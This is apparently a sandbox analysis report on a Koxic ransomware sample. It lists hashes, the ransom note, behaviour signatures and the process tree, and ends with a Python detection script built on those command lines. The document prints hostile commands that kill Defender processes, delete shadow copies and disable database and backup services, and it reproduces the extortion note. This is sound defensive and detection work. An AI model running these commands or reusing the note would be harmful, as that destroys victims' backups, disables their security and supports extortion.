Analysis

  • max time kernel
    137s
  • max time network
    158s
  • platform
    windows10_x64
  • resource
    win10-en-20211208
  • submitted
    30-01-2022 23:35

General

  • Target

    7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe

  • Size

    379KB

  • MD5

    5a44e1d5691ec9395281123ea0bd501f

  • SHA1

    64566d5049479227d2eff3d983b127c0339974cd

  • SHA256

    7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9

  • SHA512

    55d85e77f70f25bae6cf8bbf5dd787d5771c2e38e99461b608f6375be9cb0b1031f3c0268b82eb03db05eb88ce37d5f37afbfc69ab0c4f90791a706013b168c8

Malware Config

Extracted

Path

C:\Documents and Settings\WANNA_RECOVER_KOXIC_FILEZ_IHLCL.txt

Ransom Note
Hello, all your important files are encrypted and sensitive data leaked. To decrypt your files and avoid other unpleasant things you need to buy special decryption tool. Contact us via [email protected] or [email protected] and tell your UserID. This is the only way to decrypt your files and avoid public disclosure of data. Do not try to use third party software (it may corrupt your files). We respect black market rules. We can confirm the ability to decrypt your files (and of course the evidence of the leak). Send us several unimportant files (do not try to deceive us). Your UserID (send it to us for decryption

Signatures

  • Koxic

    Ransomware written in C++, first seen in late 2021.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Disables taskbar notifications via registry modification
  • Windows security modification 2 TTPs 8 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Gathers network information 2 TTPs 1 IoCs

    Uses commandline utility to view network configuration.

  • Interacts with shadow copies 2 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Kills process with taskkill 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe
    "C:\Users\Admin\AppData\Local\Temp\7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe"
    1⤵
    • Windows security modification
    • Drops file in Program Files directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2416
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c taskkill /F /IM MSASCuiL.exe taskkill /F /IM MSMpeng.exe taskkill /F /IM msseces.exe
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3700
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /F /IM MSASCuiL.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1092
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c vssadmin delete shadows /all /quiet sc config browser sc config browser start=enabled sc stop vss sc config vss start=disabled sc stop MongoDB sc config MongoDB start=disabled sc stop SQLWriter sc config SQLWriter start=disabled sc stop MSSQLServerOLAPService sc config MSSQLServerOLAPService start=disabled sc stop MSSQLSERVER sc config MSSQLSERVER start=disabled sc stop MSSQL$SQLEXPRESS sc config MSSQL$SQLEXPRESS start=disabled sc stop ReportServer sc config ReportServer start=disabled sc stop OracleServiceORCL sc config OracleServiceORCL start=disabled sc stop OracleDBConsoleorcl sc config OracleDBConsoleorcl start=disabled sc stop OracleMTSRecoveryService sc config OracleMTSRecoveryService start=disabled sc stop OracleVssWriterORCL sc config OracleVssWriterORCL start=disabled sc stop MySQL sc config MySQL start=disabled
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4080
      • C:\Windows\SysWOW64\vssadmin.exe
        vssadmin delete shadows /all /quiet
        3⤵
        • Interacts with shadow copies
        PID:1112
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c "echo OS INFO: > %TEMP%\KLHWARDQM"
      2⤵
      PID:376
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c "wmic OS get Caption,CSDVersion,OSArchitecture,Version >> %TEMP%\KLHWARDQM"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:748
      • C:\Windows\SysWOW64\Wbem\WMIC.exe
        wmic OS get Caption,CSDVersion,OSArchitecture,Version
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1564
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c "echo BIOS INFO: >> %TEMP%\KLHWARDQM"
      2⤵
      PID:2528
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c "wmic BIOS get Manufacturer, Name, SMBIOSBIOSVersion, Version >> %TEMP%\KLHWARDQM"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2356
      • C:\Windows\SysWOW64\Wbem\WMIC.exe
        wmic BIOS get Manufacturer, Name, SMBIOSBIOSVersion, Version
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2168
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c "echo CPU INFO: >> %TEMP%\KLHWARDQM"
      2⤵
      PID:4084
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c "wmic CPU get Name, NumberOfCores, NumberOfLogicalProcessors >> %TEMP%\KLHWARDQM"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3160
      • C:\Windows\SysWOW64\Wbem\WMIC.exe
        wmic CPU get Name, NumberOfCores, NumberOfLogicalProcessors
        3⤵
        PID:3060
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c "echo MEMPHYSICAL INFO: >> %TEMP%\KLHWARDQM"
      2⤵
      PID:3128
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c "wmic MEMPHYSICAL get MaxCapacity >> %TEMP%\KLHWARDQM"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2984
      • C:\Windows\SysWOW64\Wbem\WMIC.exe
        wmic MEMPHYSICAL get MaxCapacity
        3⤵
        PID:2076
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c "echo MEMORYCHIP: INFO >> %TEMP%\KLHWARDQM"
      2⤵
      PID:3684
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c "wmic MEMORYCHIP get Capacity, DeviceLocator, PartNumber, Tag >> %TEMP%\KLHWARDQM"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3308
      • C:\Windows\SysWOW64\Wbem\WMIC.exe
        wmic MEMORYCHIP get Capacity, DeviceLocator, PartNumber, Tag
        3⤵
        PID:2184
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c "echo NIC INFO: >> %TEMP%\KLHWARDQM"
      2⤵
      PID:980
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c "wmic NIC get Description, MACAddress, NetEnabled, Speed >> %TEMP%\KLHWARDQM"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1172
      • C:\Windows\SysWOW64\Wbem\WMIC.exe
        wmic NIC get Description, MACAddress, NetEnabled, Speed
        3⤵
        PID:812
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c "echo DISKDRIVE INFO: >> %TEMP%\KLHWARDQM"
      2⤵
      PID:3772
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c "wmic DISKDRIVE get InterfaceType, Name, Size, Status >> %TEMP%\KLHWARDQM"
      2⤵
      PID:1252
      • C:\Windows\SysWOW64\Wbem\WMIC.exe
        wmic DISKDRIVE get InterfaceType, Name, Size, Status
        3⤵
        PID:1484
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c "echo USERACCOUNT INFO: >> %TEMP%\KLHWARDQM"
      2⤵
      PID:1028
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c "wmic USERACCOUNT get Caption, Name, PasswordRequired, Status >> %TEMP%\KLHWARDQM"
      2⤵
      PID:1412
      • C:\Windows\SysWOW64\Wbem\WMIC.exe
        wmic USERACCOUNT get Caption, Name, PasswordRequired, Status
        3⤵
        PID:1564
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c "echo IPCONFIG: >> %TEMP%\KLHWARDQM"
      2⤵
      PID:2036
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c "ipconfig >> %TEMP%\KLHWARDQM"
      2⤵
      PID:2120
      • C:\Windows\SysWOW64\ipconfig.exe
        ipconfig
        3⤵
        • Gathers network information
        PID:2168
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c "echo DATABASES FILES: >> %TEMP%\KLHWARDQM"
      2⤵
      PID:1820
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:2128
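The process tree above spells out the sample's pre-encryption sequence, and the Signatures section names the same behaviours: taskkill against security processes, vssadmin delete shadows, sc stop / sc config start=disabled against VSS and database services, and a burst of wmic and ipconfig inventory appended to %TEMP%\KLHWARDQM. The Python below is an added example, not code from the sandbox report or from the sample. It replays the recorded command lines as constructed Sysmon-style process-creation records (PIDs and parent PIDs are taken from the tree; the sample's own parent PID of 1000 and the two benign events under parent 900 are assumptions) and applies the detection logic an analyst would want for this chain, attributing every hit to the root of its process tree so the four behaviours roll up into one verdict rather than four isolated alerts.

```python
"""Flag the Koxic pre-encryption chain in process-creation telemetry.

Added example, not code from the sandbox report or the sample. Events are
constructed Sysmon-style records whose command lines are copied from the
process tree; the sample's parent PID (1000) and the two benign events
(parent 900) are assumptions.
"""
import re
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


SAMPLE = r"C:\Users\Admin\AppData\Local\Temp\7a5e20e021dc29a07cad61f4d0bdb98e22749f13c3ace58220bfe978908bb7e9.exe"
CMD = r"C:\Windows\SysWOW64\cmd.exe"

# Constructed telemetry; command lines are those recorded in the report.
EVENTS = [
    ProcEvent(2416, 1000, SAMPLE, f'"{SAMPLE}"'),
    ProcEvent(3700, 2416, CMD, r"C:\Windows\system32\cmd.exe /c taskkill /F /IM MSASCuiL.exe taskkill /F /IM MSMpeng.exe taskkill /F /IM msseces.exe"),
    ProcEvent(1092, 3700, r"C:\Windows\SysWOW64\taskkill.exe", "taskkill /F /IM MSASCuiL.exe"),
    ProcEvent(4080, 2416, CMD, r"C:\Windows\system32\cmd.exe /c vssadmin delete shadows /all /quiet sc config browser sc config browser start=enabled sc stop vss sc config vss start=disabled sc stop MSSQLSERVER sc config MSSQLSERVER start=disabled sc stop MSSQL$SQLEXPRESS sc config MSSQL$SQLEXPRESS start=disabled"),
    ProcEvent(1112, 4080, r"C:\Windows\SysWOW64\vssadmin.exe", "vssadmin delete shadows /all /quiet"),
    ProcEvent(376, 2416, CMD, r'cmd /c "echo OS INFO: > %TEMP%\KLHWARDQM"'),
    ProcEvent(748, 2416, CMD, r'cmd /c "wmic OS get Caption,CSDVersion,OSArchitecture,Version >> %TEMP%\KLHWARDQM"'),
    ProcEvent(2356, 2416, CMD, r'cmd /c "wmic BIOS get Manufacturer, Name, SMBIOSBIOSVersion, Version >> %TEMP%\KLHWARDQM"'),
    ProcEvent(3160, 2416, CMD, r'cmd /c "wmic CPU get Name, NumberOfCores, NumberOfLogicalProcessors >> %TEMP%\KLHWARDQM"'),
    ProcEvent(2120, 2416, CMD, r'cmd /c "ipconfig >> %TEMP%\KLHWARDQM"'),
    # Assumed benign admin activity: same tools, none of the ransomware pattern.
    ProcEvent(5000, 900, CMD, r'cmd /c "wmic OS get Caption"'),
    ProcEvent(5001, 900, r"C:\Windows\System32\vssadmin.exe", "vssadmin list shadows"),
]

# Processes the report shows being killed, and services it shows being stopped/disabled.
SECURITY_PROCESSES = {"msascuil.exe", "msmpeng.exe", "msseces.exe"}
RECOVERY_OR_DB_SERVICES = {
    "vss", "sqlwriter", "mssqlserverolapservice", "mssqlserver", "mssql$sqlexpress",
    "reportserver", "mongodb", "mysql", "oracleserviceorcl", "oracledbconsoleorcl",
    "oraclemtsrecoveryservice", "oraclevsswriterorcl",
}
TASKKILL_IMAGE_RE = re.compile(r"/IM\s+(\S+)", re.I)
VSS_DELETE_RE = re.compile(r"\bvssadmin\b.*\bdelete\s+shadows\b", re.I)
SC_STOP_RE = re.compile(r"\bsc\s+stop\s+(\S+)", re.I)
SC_DISABLE_RE = re.compile(r"\bsc\s+config\s+(\S+)\s+start=\s*disabled", re.I)
WMIC_CLASS_RE = re.compile(r"\bwmic\s+(\w+)\s+get\b", re.I)
REDIRECT_RE = re.compile(r">>?\s*(\S+)")
INVENTORY_THRESHOLD = 3  # distinct collectors appended to one output file


def root_of(pid, by_pid):
    """Follow the parent chain to the earliest ancestor we have telemetry for."""
    seen = set()
    while pid not in seen and pid in by_pid and by_pid[pid].ppid in by_pid:
        seen.add(pid)
        pid = by_pid[pid].ppid
    return pid


def analyze(events):
    """Return {root_pid: set(tags)} for every process tree showing a tagged behaviour."""
    by_pid = {e.pid: e for e in events}
    tags = defaultdict(set)
    inventory = defaultdict(lambda: defaultdict(set))  # root -> output file -> collectors
    for e in events:
        root = root_of(e.pid, by_pid)
        cmd = e.cmdline
        if "taskkill" in cmd.lower():
            killed = {m.lower() for m in TASKKILL_IMAGE_RE.findall(cmd)}
            if killed & SECURITY_PROCESSES:
                tags[root].add("kills_security_tooling")
        if VSS_DELETE_RE.search(cmd):  # 'vssadmin list shadows' does not match
            tags[root].add("deletes_shadow_copies")
        touched = {s.lower() for s in SC_STOP_RE.findall(cmd) + SC_DISABLE_RE.findall(cmd)}
        if touched & RECOVERY_OR_DB_SERVICES:
            tags[root].add("disables_backup_or_db_services")
        redirect = REDIRECT_RE.search(cmd)
        if redirect:
            # Many short inventory commands funnelled into one file is the signal,
            # not any single wmic call, which is routine admin activity.
            target = redirect.group(1).strip('"').lower()
            collectors = {c.lower() for c in WMIC_CLASS_RE.findall(cmd)}
            if re.search(r"\bipconfig\b", cmd, re.I):
                collectors.add("ipconfig")
            inventory[root][target] |= collectors
    for root, files in inventory.items():
        if any(len(c) >= INVENTORY_THRESHOLD for c in files.values()):
            tags[root].add("system_inventory_to_file")
    return dict(tags)


def verdict(root_tags):
    """Collapse a tree's tags into a triage verdict."""
    if {"deletes_shadow_copies", "kills_security_tooling"} <= root_tags or len(root_tags) >= 3:
        return "ransomware_pre_encryption"
    return "suspicious" if root_tags else "benign"


if __name__ == "__main__":
    for root, found in analyze(EVENTS).items():
        print(root, verdict(found), sorted(found))
```

Two design points carry over to real telemetry: the tree-root attribution is what lets a taskkill two levels down (cmd.exe, then taskkill.exe) count against the sample rather than against cmd.exe, and the inventory rule deliberately needs several distinct collectors writing to the same file, because a lone `wmic OS get Caption` from a help-desk script must not fire. Real Sysmon Event ID 1 records carry the same four fields used here (ProcessId, ParentProcessId, Image, CommandLine), so the constructed list can be swapped for parsed events without changing the rules.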

Network

MITRE ATT&CK Enterprise v6
